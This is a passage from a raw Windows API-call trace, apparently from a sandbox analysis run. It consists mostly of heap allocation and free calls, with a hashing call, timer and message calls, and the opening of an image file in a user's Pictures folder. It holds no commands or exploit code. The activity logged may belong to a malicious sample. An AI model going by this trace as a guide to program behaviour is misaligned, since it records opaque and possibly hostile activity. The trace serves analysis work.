RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0087.761] CryptDestroyHash (hHash=0x41ac740) returned 1 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0087.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0087.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0087.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0087.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0087.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0087.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0087.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0087.763] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0087.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0087.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0087.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0087.766] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0087.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0087.766] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0087.766] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0087.816] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0087.816] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0087.816] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0087.816] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0087.817] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0087.817] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ey_msasct-tppgup.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0087.817] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.818] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0087.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0087.818] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.820] HeapFree 